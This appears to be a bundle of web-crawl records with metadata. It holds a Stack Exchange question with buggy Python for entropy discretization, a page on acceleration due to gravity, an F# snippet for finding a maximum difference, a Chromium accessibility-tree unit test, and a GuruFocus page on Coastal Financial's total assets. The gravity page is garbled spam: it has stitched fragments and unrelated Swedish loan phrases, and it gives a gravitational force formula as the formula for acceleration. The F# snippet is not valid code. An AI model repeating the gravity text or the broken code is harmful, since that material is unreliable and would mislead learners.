uniqueValue(s):\n# are records in s the same? return true\nif s.nunique()['A1'] == 1:\nreturn False\n# otherwise false\nelse:\nreturn True\n\ndef maxPartition(maxInformationGain,maxThreshold,s,s1,s2):\nprint(f'informationGain: {maxInformationGain}, threshold: {maxThreshold}')\nmerged_partitions = pd.merge(s1,s2)\nmerged_partitions = pd.merge(merged_partitions,s)\nprint(\"Best Partition\")\nprint(\"***************\")\nprint(merged_partitions)\nprint(\"***************\")\nreturn merged_partitions\n\ndef information_gain(s1, s2, s):\n# calculate cardinality for s1\ncardinalityS1 = len(pd.Index(s1['A1']).value_counts())\nprint(f'The Cardinality of s1 is: {cardinalityS1}')\n# calculate cardinality for s2\ncardinalityS2 = len(pd.Index(s2['A1']).value_counts())\nprint(f'The Cardinality of s2 is: {cardinalityS2}')\n# calculate cardinality of s\ncardinalityS = len(pd.Index(s['A1']).value_counts())\nprint(f'The Cardinality of s is: {cardinalityS}')\n# calculate informationGain\ninformationGain = (cardinalityS1/cardinalityS) * entropy(s1) + (cardinalityS2/cardinalityS) * entropy(s2)\nprint(f'The total informationGain is: {informationGain}')\nreturn informationGain\n\ndef entropy(s):\nprint(\"calculating the entropy for s\")\nprint(\"*****************************\")\nprint(s)\nprint(\"*****************************\")\n\n# initialize ent\nent = 0\n\n# calculate the number of classes in s\nnumberOfClasses = s['Class'].nunique()\nprint(f'Number of classes for dataset: {numberOfClasses}')\nvalue_counts = s['Class'].value_counts()\np = []\nfor i in range(0,numberOfClasses):\nn = s['Class'].count()\n# calculate the frequency of class_i in S1\nprint(f'p{i} {value_counts.iloc[i]}/{n}')\nf = value_counts.iloc[i]\npi = f/n\np.append(pi)\n\nprint(p)\n\nfor pi in p:\nent += -pi*log2(pi)\n\nreturn ent\n\nmain()\n\n\nA set sample data looks like this\n\nA1,A2,A3,Class\n2,0.4631338,1.5,3\n8,0.7460648,3.0,3\n6,0.264391038,2.5,2\n5,0.4406713,2.3,1\n2,0.410438159,1.5,3\n2,0.302901816,1.5,2\n6,0.275869396,2.5,3\n\n\nAny help understanding why the method returns an empty dataset would be greatly appreciated.\n\nI've attempted to create a procedure for this which splits the data into two partitions, but I would appreciate feedback as to whether my implementation is correct\n\nfrom numpy.core.defchararray import count\nimport pandas as pd\nimport numpy as np\nimport numpy as np\nfrom math import floor, log2\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plot\n\ndef print_full(x):\npd.set_option('display.max_rows', len(x))\nprint(x)\npd.reset_option('display.max_rows')\n\ndef main():\nprint(\"******************************************************\")\nprint(\"Entropy Discretization STARTED\")\ns = entropy_discretization(s)\nprint(\"Entropy Discretization COMPLETED\")\n\n# This method discretizes attribute A1\n# If the information gain is 0, i.e the number of\n# distinct class is 1 or\n# If min f/ max f < 0.5 and the number of distinct values is floor(n/2)\n# Then that partition stops splitting.\n# This method discretizes s A1\n# If the information gain is 0, i.e the number of\n# distinct class is 1 or\n# If min f/ max f < 0.5 and the number of distinct values is floor(n/2)\n# Then that partition stops splitting.\ndef entropy_discretization(s):\n\nI = {}\ni = 0\nn = s.nunique()['Class']\ns1 = pd.DataFrame()\ns2 = pd.DataFrame()\ndistinct_values = s['Class'].value_counts().index\ninformation_gain_indicies = []\nprint(f'The unique values for dataset s[\"Class\"] are {distinct_values}')\nfor i in distinct_values:\n\n# Step 1: pick a threshold\nthreshold = i\nprint(f'Using threshold {threshold}')\n\n# Step 2: Partititon the data set into two parttitions\ns1 = s[s['Class'] < threshold]\nprint(\"s1 after spitting\")\nprint(s1)\nprint(\"******************\")\ns2 = s[s['Class'] >= threshold]\nprint(\"s2 after spitting\")\nprint(s2)\nprint(\"******************\")\n\nprint(\"******************\")\nprint(\"calculating maxf\")\nprint(f\" maxf {maxf(s['Class'])}\")\nprint(\"******************\")\n\nprint(\"******************\")\nprint(\"calculating minf\")\nprint(f\" maxf {minf(s['Class'])}\")\nprint(\"******************\")\n\nprint(f\"Checking condition a if {s1.nunique()['Class']} == {1}\")\nif (s1.nunique()['Class'] == 1):\nbreak\n\nprint(f\"Checking condition b {maxf(s1['Class'])}/{minf(s1['Class'])} < {0.5} {s1.nunique()['Class']} == {floor(n/2)}\")\nif (maxf(s1['Class'])/minf(s1['Class']) < 0.5) and (s1.nunique()['Class'] == floor(n/2)):\nprint(f\"Condition b is met{maxf(s1['Class'])}/{minf(s1['Class'])} < {0.5} {s1.nunique()['Class']} == {floor(n/2)}\")\nbreak\n\n# Step 3: calculate the information gain.\ninformationGain = information_gain(s1,s2,s)\nI.update({f'informationGain_{i}':informationGain,f'threshold_{i}': threshold})\ninformation_gain_indicies.append(i)\n\n# Step 5: calculate the min information gain\nn = int(((len(I)/2)-1))\nprint(\"Calculating maximum threshold\")\nprint(\"*****************************\")\nmaxInformationGain = 0\nmaxThreshold = 0\nfor i in information_gain_indicies:\nif(I[f'informationGain_{i}'] > maxInformationGain):\nmaxInformationGain = I[f'informationGain_{i}']\nmaxThreshold = I[f'threshold_{i}']\n\nprint(f'maxThreshold: {maxThreshold}, maxInformationGain: {maxInformationGain}')\n\npartitions = [s1,s2]\ns = pd.concat(partitions)\n\n# Step 6: keep the partitions of S based on the value of threshold_i\nreturn s #maxPartition(maxInformationGain,maxThreshold,s,s1,s2)\n\ndef maxf(s):\nreturn s.max()\n\ndef minf(s):\nreturn s.min()\n\ndef uniqueValue(s):\n# are records in s the same? return true\nif s.nunique()['Class'] == 1:\nreturn False\n# otherwise false\nelse:\nreturn True\n\ndef maxPartition(maxInformationGain,maxThreshold,s,s1,s2):\nprint(f'informationGain: {maxInformationGain}, threshold: {maxThreshold}')\nmerged_partitions = pd.merge(s1,s2)\nmerged_partitions = pd.merge(merged_partitions,s)\nprint(\"Best Partition\")\nprint(\"***************\")\nprint(merged_partitions)\nprint(\"***************\")\nreturn merged_partitions\n\ndef information_gain(s1, s2, s):\n# calculate cardinality for s1\ncardinalityS1 = len(pd.Index(s1['Class']).value_counts())\nprint(f'The Cardinality of s1 is: {cardinalityS1}')\n# calculate cardinality for s2\ncardinalityS2 = len(pd.Index(s2['Class']).value_counts())\nprint(f'The Cardinality of s2 is: {cardinalityS2}')\n# calculate cardinality of s\ncardinalityS = len(pd.Index(s['Class']).value_counts())\nprint(f'The Cardinality of s is: {cardinalityS}')\n# calculate informationGain\ninformationGain = (cardinalityS1/cardinalityS) * entropy(s1) + (cardinalityS2/cardinalityS) * entropy(s2)\nprint(f'The total informationGain is: {informationGain}')\nreturn informationGain\n\ndef entropy(s):\nprint(\"calculating the entropy for s\")\nprint(\"*****************************\")\nprint(s)\nprint(\"*****************************\")\n\n# initialize ent\nent = 0\n\n# calculate the number of classes in s\nnumberOfClasses = s['Class'].nunique()\nprint(f'Number of classes for dataset: {numberOfClasses}')\nvalue_counts = s['Class'].value_counts()\np = []\nfor i in range(0,numberOfClasses):\nn = s['Class'].count()\n# calculate the frequency of class_i in S1\nprint(f'p{i} {value_counts.iloc[i]}/{n}')\nf = value_counts.iloc[i]\npi = f/n\np.append(pi)\n\nprint(p)\n\nfor pi in p:\nent += -pi*log2(pi)\n\nreturn ent" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.59216774,"math_prob":0.98235,"size":5641,"snap":"2023-40-2023-50","text_gpt3_token_len":1631,"char_repetition_ratio":0.22653894,"word_repetition_ratio":0.005961252,"special_character_ratio":0.3623471,"punctuation_ratio":0.15384616,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.997613,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-08T03:56:33Z\",\"WARC-Record-ID\":\"<urn:uuid:85ea40a9-0c45-4055-aa02-88e74c60250e>\",\"Content-Length\":\"171978\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:44d3a4b9-9fa9-427b-a7d3-fe92b9c74c1b>\",\"WARC-Concurrent-To\":\"<urn:uuid:5aa15cb1-4f0e-45ec-abe2-01404c89e87a>\",\"WARC-IP-Address\":\"172.64.144.30\",\"WARC-Target-URI\":\"https://datascience.stackexchange.com/questions/103339/how-to-apply-entropy-discretization-to-a-dataset\",\"WARC-Payload-Digest\":\"sha1:JHJL7GXFEDRFFSDCOKL2INYBHPFSVXTV\",\"WARC-Block-Digest\":\"sha1:2OGSPLXBUUYUKEQ4CILZ2A7LNXEQFTDY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100710.22_warc_CC-MAIN-20231208013411-20231208043411-00162.warc.gz\"}"}
https://affarerurpb.web.app/3881/49456.html
[ "# fall for any object, then the acceleration due to gravity can be easily determine by using equation (2). II. MATERIALS AND METHOD. The materials used during\n\na g = g = acceleration of gravity (9.81 m/s 2, 32.17405 ft/s 2) The force caused by gravity - a g - is called weight. Note! mass is a property - a quantity with magnitude ; force is a vector - a quantity with magnitude and direction; The acceleration of gravity can be observed by measuring the change of velocity related to change of time for a\n\nNear the surface of Earth, the acceleration due to The formula is: F = G m 1 m 2 r 2 {\\displaystyle F=G{\\frac {m_{1}m_{2}}{r^{2}}}\\ } where m 1 {\\displaystyle m_{1}} and m 2 {\\displaystyle m_{2}} are any two masses, G {\\displaystyle G} is the gravitational constant , and r {\\displaystyle r} is the distance between the two point-like masses. Therefore, the formula of acceleration due to gravity is given by, g = GM/r 2. Note: It Acceleration Due to Gravity Formula Questions: 1) The radius of the moon is 1.74 x 10 6 m. The mass of the moon is 7.35 x 10 22 kg. Find the acceleration due to 2) The radius of the Earth is 6.38 x 10 6 m. The mass of the Earth is 5.98x 10 24 kg.\n\nAcceleration Due To Gravity Formula: g = G*M/R2 Free Falling objects are falling under the sole influence of gravity. This force causes all free-falling objects on Earth to have a unique acceleration value of approximately 9.8 m/s/s, directed downward. We refer to this special acceleration as the acceleration caused by gravity or simply the acceleration of gravity. acceleration of gravity to inch/second² (g—in/s²) the force acting upon a body is equal to the product of its mass and acceleration, expressed by the formula F = ma, where F is the force, m is the mass, Some pilots and crew of high-speed aircraft also have to do this training due to high acceleration … 2019-10-05 Among the planets, the acceleration due to gravity is minimum on the mercury. Relation between g and G is given by, g = $$\\frac{G M}{R^{2}}$$ where, M = mass of the earth = 6.4 x 10 24 kg and R = radius of the earth = 6.38 x 10 6 m.\n\nAt 10 m/s² down, velocity changes by 10 meters per second  In outer space where there is no gravity you mass will still be same but your weight will be zero. 16.\n• The equation that relates weight and mass is W = mg  Mar 18, 2014 GRAVITATIONAL ACCELERATION EQUATION WITH WAVE-.\n\n## The formula for the acceleration due to gravity is based on Newton’s Second Law of Motion and Newton’s Law of Universal Gravitation. That means, acceleration due to gravity = (gravitational constant x mass of the earth) / (radius of the earth) 2. According to this equation acceleration due to gravity does not depend on the mass of the body.\n\nGravitational acceleration, the acceleration caused by the gravitational attraction of massive bodies in general; Gravity of Earth, the acceleration caused by the combination of gravitational attraction and centrifugal force of the Earth; Standard gravity, or g, the standard value of gravitational acceleration at sea level on Earth 2018-04-01 Formula for acceleration due to gravity is: G = k.M1.M2/ r2. 2020-07-26 Shows how to calculate the acceleration due to gravity.", null, "### Acceleration due to gravity is the instantaneous change in downward velocity (acceleration) caused by the force of gravity toward the center of mass. It is typically experienced on large bodies like planets, moons, stars and asteroids but can occur minutely with smaller masses.\n\nFormula of Acceleration due to Gravity. Force acting on a body due to gravity is given by, f = mg.\n\nExample 2: The radius of the Earth is 6.38 x 106 m. The Acceleration Due to Gravity The magnitude of the acceleration due to gravity, denoted with a lower case g, is 9.8 m/s 2.\nJuridisk begrepp", null, "This will result in an answer 3.14 times less than the true answer. The acceleration due to gravity at the surface of Earth is represented as \"g\" and has a standard value of 9.80665 m/s2. Follow the below tutorial which guides on how to calculate acceleration due to gravity. Acceleration Due To Gravity Formula: g = G*M/R2 The Acceleration Due to Gravity The magnitude of the acceleration due to gravity, denoted with a lower case g, is 9.8 m/s 2.\n\nU = 7.35 J. The potential energy due to gravity of the model airplane is 7.35 Joules.\nKopa hus utan kontantinsats", null, "avsluta netflix\narabic grammar\nlumavägen stockholm\nrattan chair\nlånekalkyl seb" ]
[ null, "https://picsum.photos/800/616", null, "https://picsum.photos/800/614", null, "https://picsum.photos/800/611", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8470038,"math_prob":0.98784083,"size":6149,"snap":"2023-14-2023-23","text_gpt3_token_len":1571,"char_repetition_ratio":0.20292921,"word_repetition_ratio":0.07656396,"special_character_ratio":0.24784517,"punctuation_ratio":0.096586175,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9996157,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-04-02T08:51:18Z\",\"WARC-Record-ID\":\"<urn:uuid:7d31ee2d-29ab-4fbe-bc88-bd48580b652b>\",\"Content-Length\":\"11645\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:836c2ccd-233f-4d4f-ad8f-1e6fb9ed4abb>\",\"WARC-Concurrent-To\":\"<urn:uuid:59001892-663e-4634-a073-31696b2f4685>\",\"WARC-IP-Address\":\"199.36.158.100\",\"WARC-Target-URI\":\"https://affarerurpb.web.app/3881/49456.html\",\"WARC-Payload-Digest\":\"sha1:KN627ZVFKEGOLB2SMC427TJUR2ILK4VE\",\"WARC-Block-Digest\":\"sha1:6I4UZNMSNBCS3GW4PE32HEXH7GRW3ECV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296950422.77_warc_CC-MAIN-20230402074255-20230402104255-00514.warc.gz\"}"}
http://apollo13cn.blogspot.com/2011/04/find-maximum-difference-in-sequence.html
[ "## Friday, April 29, 2011\n\n### Find the maximum difference in a sequence\n\nLet us put another interview question solution with F# (functional way). The question is to find the x[a], x[b], where x[b] - x[a] -> maximum\n\nwe are going to find a tuple (a,b) where x[b] - x[a] -> maximum. Be careful b must be greater than a. So our first problem will be how to generate a sequence (a,b) where b>a and a between (0, L).\n\nf(i) will generate a sequence from i to L.\nf(i) -> [i..L] |> Seq.map (n-> (i,n))\n\n[0..L]\n|> Seq.map (i-> Seq.map (n->(i,n)) [i..L] ) //generate the (a,b) tuple\n|> Seq.collect (n->n) //flatten the sequence\n|> Seq.maxby ((a,b)->x[b]-x[a]) //find the max dif" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7876756,"math_prob":0.9849944,"size":620,"snap":"2023-40-2023-50","text_gpt3_token_len":202,"char_repetition_ratio":0.116883114,"word_repetition_ratio":0.018518519,"special_character_ratio":0.36451614,"punctuation_ratio":0.1656051,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99809206,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-10-02T17:39:51Z\",\"WARC-Record-ID\":\"<urn:uuid:698c1fee-7ab3-4c98-88e7-37cdd5c29827>\",\"Content-Length\":\"65342\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1a0ad6c0-4fe4-48c1-babd-be7c4eec37ed>\",\"WARC-Concurrent-To\":\"<urn:uuid:d4a505b0-11f6-4d19-b295-6232d4d2c523>\",\"WARC-IP-Address\":\"172.253.62.132\",\"WARC-Target-URI\":\"http://apollo13cn.blogspot.com/2011/04/find-maximum-difference-in-sequence.html\",\"WARC-Payload-Digest\":\"sha1:ECT4ZOZ4I4FJ6VJRKUFOD4DFQDBUT2MM\",\"WARC-Block-Digest\":\"sha1:M6AGYUEVTUBL5U5J2MNOLSL5E2ELP3WH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233511002.91_warc_CC-MAIN-20231002164819-20231002194819-00296.warc.gz\"}"}
https://chromium.googlesource.com/chromium/src/+/d35c9d907350c7fdd5f0e49c63de8fa40a56b0ee/ui/accessibility/ax_generated_tree_unittest.cc
[ "blob: 3d0f49575b603a4e7361fc3131565f698895154c [file] [log] [blame]\n // Copyright 2014 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include #include #include \"base/stl_util.h\" #include \"base/strings/string_number_conversions.h\" #include \"testing/gtest/include/gtest/gtest.h\" #include \"ui/accessibility/ax_node.h\" #include \"ui/accessibility/ax_serializable_tree.h\" #include \"ui/accessibility/ax_tree.h\" #include \"ui/accessibility/ax_tree_serializer.h\" #include \"ui/accessibility/tree_generator.h\" namespace ui { namespace { // A function to turn a tree into a string, capturing only the node ids // and their relationship to one another. // // The string format is kind of like an S-expression, with each expression // being either a node id, or a node id followed by a subexpression // representing its children. // // Examples: // // (1) is a tree with a single node with id 1. // (1 (2 3)) is a tree with 1 as the root, and 2 and 3 as its children. // (1 (2 (3))) has 1 as the root, 2 as its child, and then 3 as the child of 2. std::string TreeToStringHelper(const AXNode* node) { std::string result = base::NumberToString(node->id()); if (node->children().empty()) return result; const auto add_children = [](const std::string& str, const auto* node) { return str + \" \" + TreeToStringHelper(node); }; return result + \" (\" + std::accumulate(node->children().cbegin() + 1, node->children().cend(), TreeToStringHelper(node->children().front()), add_children) + \")\"; } std::string TreeToString(const AXTree& tree) { return \"(\" + TreeToStringHelper(tree.root()) + \")\"; } } // anonymous namespace // Test the TreeGenerator class by building all possible trees with // 3 nodes and the ids [1...3], with no permutations of ids. TEST(AXGeneratedTreeTest, TestTreeGeneratorNoPermutations) { int tree_size = 3; TreeGenerator generator(tree_size, false); const char* EXPECTED_TREES[] = { \"(1)\", \"(1 (2))\", \"(1 (2 3))\", \"(1 (2 (3)))\", }; int n = generator.UniqueTreeCount(); ASSERT_EQ(static_cast(base::size(EXPECTED_TREES)), n); for (int i = 0; i < n; ++i) { AXTree tree; generator.BuildUniqueTree(i, &tree); std::string str = TreeToString(tree); EXPECT_EQ(EXPECTED_TREES[i], str); } } // Test the TreeGenerator class by building all possible trees with // 3 nodes and the ids [1...3] permuted in any order. TEST(AXGeneratedTreeTest, TestTreeGeneratorWithPermutations) { int tree_size = 3; TreeGenerator generator(tree_size, true); const char* EXPECTED_TREES[] = { \"(1)\", \"(1 (2))\", \"(2 (1))\", \"(1 (2 3))\", \"(2 (1 3))\", \"(3 (1 2))\", \"(1 (3 2))\", \"(2 (3 1))\", \"(3 (2 1))\", \"(1 (2 (3)))\", \"(2 (1 (3)))\", \"(3 (1 (2)))\", \"(1 (3 (2)))\", \"(2 (3 (1)))\", \"(3 (2 (1)))\", }; int n = generator.UniqueTreeCount(); ASSERT_EQ(static_cast(base::size(EXPECTED_TREES)), n); for (int i = 0; i < n; i++) { AXTree tree; generator.BuildUniqueTree(i, &tree); std::string str = TreeToString(tree); EXPECT_EQ(EXPECTED_TREES[i], str); } } // Test mutating every possible tree with nodes to every other possible // tree with nodes, where is 4 in release mode and 3 in debug mode // (for speed). For each possible combination of trees, we also vary which // node we serialize first. // // For every possible scenario, we check that the AXTreeUpdate is valid, // that the destination tree can unserialize it and create a valid tree, // and that after updating all nodes the resulting tree now matches the // intended tree. TEST(AXGeneratedTreeTest, SerializeGeneratedTrees) { // Do a more exhaustive test in release mode. If you're modifying // the algorithm you may want to try even larger tree sizes if you // can afford the time. #ifdef NDEBUG int max_tree_size = 4; #else LOG(WARNING) << \"Debug build, only testing trees with 3 nodes and not 4.\"; int max_tree_size = 3; #endif TreeGenerator generator0(max_tree_size, false); int n0 = generator0.UniqueTreeCount(); TreeGenerator generator1(max_tree_size, true); int n1 = generator1.UniqueTreeCount(); for (int i = 0; i < n0; i++) { // Build the first tree, tree0. AXSerializableTree tree0; generator0.BuildUniqueTree(i, &tree0); SCOPED_TRACE(\"tree0 is \" + TreeToString(tree0)); for (int j = 0; j < n1; j++) { // Build the second tree, tree1. AXSerializableTree tree1; generator1.BuildUniqueTree(j, &tree1); SCOPED_TRACE(\"tree1 is \" + TreeToString(tree1)); int tree_size = tree1.size(); // Now iterate over which node to update first, |k|. for (int k = 0; k < tree_size; k++) { // Iterate over a node to invalidate, |l| (zero means no invalidation). for (int l = 0; l <= tree_size; l++) { SCOPED_TRACE(\"i=\" + base::NumberToString(i) + \" j=\" + base::NumberToString(j) + \" k=\" + base::NumberToString(k) + \" l=\" + base::NumberToString(l)); // Start by serializing tree0 and unserializing it into a new // empty tree |dst_tree|. std::unique_ptr> tree0_source(tree0.CreateTreeSource()); AXTreeSerializer serializer( tree0_source.get()); AXTreeUpdate update0; ASSERT_TRUE(serializer.SerializeChanges(tree0.root(), &update0)); AXTree dst_tree; ASSERT_TRUE(dst_tree.Unserialize(update0)); // At this point, |dst_tree| should now be identical to |tree0|. EXPECT_EQ(TreeToString(tree0), TreeToString(dst_tree)); // Next, pretend that tree0 turned into tree1. std::unique_ptr> tree1_source(tree1.CreateTreeSource()); serializer.ChangeTreeSourceForTesting(tree1_source.get()); // Invalidate a subtree rooted at one of the nodes. if (l > 0) serializer.InvalidateSubtree(tree1.GetFromId(l)); // Serialize a sequence of updates to |dst_tree| to match. for (int k_index = 0; k_index < tree_size; ++k_index) { int id = 1 + (k + k_index) % tree_size; AXTreeUpdate update; ASSERT_TRUE( serializer.SerializeChanges(tree1.GetFromId(id), &update)); ASSERT_TRUE(dst_tree.Unserialize(update)); } // After the sequence of updates, |dst_tree| should now be // identical to |tree1|. EXPECT_EQ(TreeToString(tree1), TreeToString(dst_tree)); } } } } } } // namespace ui" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5484219,"math_prob":0.96283525,"size":6246,"snap":"2019-43-2019-47","text_gpt3_token_len":1827,"char_repetition_ratio":0.13729574,"word_repetition_ratio":0.105968334,"special_character_ratio":0.33733588,"punctuation_ratio":0.22243167,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98081565,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-22T16:12:05Z\",\"WARC-Record-ID\":\"<urn:uuid:15a04d2b-d9c0-48c3-909a-8393e9fd30b5>\",\"Content-Length\":\"80445\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0b7e1e33-9b42-4379-a2cb-3097507f482f>\",\"WARC-Concurrent-To\":\"<urn:uuid:8a246ccd-957a-418c-8b66-ab0d9fe8daec>\",\"WARC-IP-Address\":\"209.85.232.82\",\"WARC-Target-URI\":\"https://chromium.googlesource.com/chromium/src/+/d35c9d907350c7fdd5f0e49c63de8fa40a56b0ee/ui/accessibility/ax_generated_tree_unittest.cc\",\"WARC-Payload-Digest\":\"sha1:K2RZITJASFOR4VICUEKJWDEX4UADEF2R\",\"WARC-Block-Digest\":\"sha1:QBJPXOCYZLXO6XF5QSI7JOFCVVCJZME3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570987822458.91_warc_CC-MAIN-20191022155241-20191022182741-00511.warc.gz\"}"}
https://www.gurufocus.com/term/Total+Assets/NAS:CCB/Total-Assets/Coastal%20Financial
[ "Switch to:\n\n# Coastal Financial Total Assets\n\n: \\$1,678.96 Mil (As of Jun. 2020)\nView and export this data going back to 2018. Start your Free Trial\n\nCoastal Financial's Total Assets for the quarter that ended in Jun. 2020 was \\$1,678.96 Mil.\n\nDuring the past 12 months, Coastal Financial's average Total Assets Growth Rate was 23.10% per year. During the past 3 years, the average Total Assets Growth Rate was 16.20% per year.\n\nDuring the past 4 years, Coastal Financial's highest 3-Year average Total Assets Growth Rate was 16.20%. The lowest was 16.20%. And the median was 16.20%.\n\nTotal Assets is connected with ROA %. Coastal Financial's annualized ROA % for the quarter that ended in Jun. 2020 was 1.03%. Total Assets is also linked to Revenue through Asset Turnover. Coastal Financial's Asset Turnover for the quarter that ended in Jun. 2020 was 0.01.\n\n## Coastal Financial Total Assets Historical Data\n\n* All numbers are in millions except for per share data and ratio. All numbers are in their local exchange's currency.\n\n Coastal Financial Annual Data Dec16 Dec17 Dec18 Dec19 Total Assets 740.61 805.75 952.11 1,128.53\n\n Coastal Financial Quarterly Data Dec16 Mar17 Jun17 Sep17 Dec17 Mar18 Jun18 Sep18 Dec18 Mar19 Jun19 Sep19 Dec19 Mar20 Jun20 Total Assets", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "1,031.02 1,090.06 1,128.53 1,184.07 1,678.96\n\nCompetitive Comparison\n* Competitive companies are chosen from companies within the same industry, with headquarter located in same country, with closest market capitalization; x-axis shows the market cap, and y-axis shows the term value; the bigger the dot, the larger the market cap.\n\nCoastal Financial Total Assets Distribution\n\n* The bar in red indicates where Coastal Financial's Total Assets falls into.\n\n## Coastal Financial Total Assets Calculation\n\nTotal Assets are all the assets a company owns.\n\nFrom the capital sources of the assets, some of the assets are funded through shareholder's paid in capital and retained earnings of the business. Others are funded through borrowed money.\n\nCoastal Financial's Total Assets for the fiscal year that ended in Dec. 2019 is calculated as\n\n Total Assets = Total Equity (A: Dec. 2019 ) + Total Liabilities (A: Dec. 2019 ) = 124.173 + 1004.353 = 1,128.53\n\nCoastal Financial's Total Assets for the quarter that ended in Jun. 2020 is calculated as\n\n Total Assets = Total Equity (Q: Jun. 2020 ) + Total Liabilities (Q: Jun. 2020 ) = 130.977 + 1547.979 = 1,678.96\n\n* All numbers are in millions except for per share data and ratio. All numbers are in their local exchange's currency.\n\nCoastal Financial  (NAS:CCB) Total Assets Explanation\n\nTotal Assets is connected with ROA %.\n\nCoastal Financial's annualized ROA % for the quarter that ended in Jun. 2020 is\n\n ROA % = Net Income (Q: Jun. 2020 ) / ( (Total Assets (Q: Mar. 2020 ) + Total Assets (Q: Jun. 2020 )) / count ) = 14.684 / ( (1184.071 + 1678.956) / 2 ) = 14.684 / 1431.5135 = 1.03 %\n\nNote: The Net Income data used here is four times the quarterly (Jun. 2020) data.\n\nIn the article Joining The Dark Side: Pirates, Spies and Short Sellers, James Montier reported that In their US sample covering the period 1968-2003, Cooper et al find that firms with low asset growth outperformed firms with high asset growth by an astounding 20% p.a. equally weighted. Even when controlling for market, size and style, low asset growth firms outperformed high asset growth firms by 13% p.a. Therefore a company with fast asset growth may underperform.\n\nTotal Assets is linked to total revenue through Asset Turnover.\n\nCoastal Financial's Asset Turnover for the quarter that ended in Jun. 2020 is\n\n Asset Turnover = Revenue (Q: Jun. 2020 ) / ( (Total Assets (Q: Mar. 2020 ) + Total Assets (Q: Jun. 2020 )) / count ) = 15.513 / ( (1184.071 + 1678.956) / 2 ) = 15.513 / 1431.5135 = 0.01\n\n* All numbers are in millions except for per share data and ratio. All numbers are in their local exchange's currency.\n\nTherefore, if a company grows its Total Assets faster than its Revenue, the Asset Turnover will decline. This might be a warning sign for the business." ]
[ null, "https://gurufocus.s3.amazonaws.com/images/blur.png", null, "https://gurufocus.s3.amazonaws.com/images/blur.png", null, "https://gurufocus.s3.amazonaws.com/images/blur.png", null, "https://gurufocus.s3.amazonaws.com/images/blur.png", null, "https://gurufocus.s3.amazonaws.com/images/blur.png", null, "https://gurufocus.s3.amazonaws.com/images/blur.png", null, "https://gurufocus.s3.amazonaws.com/images/blur.png", null, "https://gurufocus.s3.amazonaws.com/images/blur.png", null, "https://gurufocus.s3.amazonaws.com/images/blur.png", null, "https://gurufocus.s3.amazonaws.com/images/blur.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88411885,"math_prob":0.8900628,"size":3496,"snap":"2020-45-2020-50","text_gpt3_token_len":976,"char_repetition_ratio":0.15950744,"word_repetition_ratio":0.32231405,"special_character_ratio":0.32837528,"punctuation_ratio":0.16405135,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9670816,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-21T21:41:16Z\",\"WARC-Record-ID\":\"<urn:uuid:d8e90747-5c9d-4e02-a285-f9987ec2fb61>\",\"Content-Length\":\"373161\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c01a5cfd-2586-4b0a-b111-34a2bd3325af>\",\"WARC-Concurrent-To\":\"<urn:uuid:d1a0a7c5-2787-43f8-b1ed-71050216a26a>\",\"WARC-IP-Address\":\"104.26.14.56\",\"WARC-Target-URI\":\"https://www.gurufocus.com/term/Total+Assets/NAS:CCB/Total-Assets/Coastal%20Financial\",\"WARC-Payload-Digest\":\"sha1:MAFNJWPFXJTQUX3R3435VA43EISN7NUU\",\"WARC-Block-Digest\":\"sha1:NARTPG6JWKVV24ZCLTQBXAXV3DT6MKL3\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107878633.8_warc_CC-MAIN-20201021205955-20201021235955-00377.warc.gz\"}"}
https://gis.stackexchange.com/questions/53265/removing-rows-in-shapefile-in-r
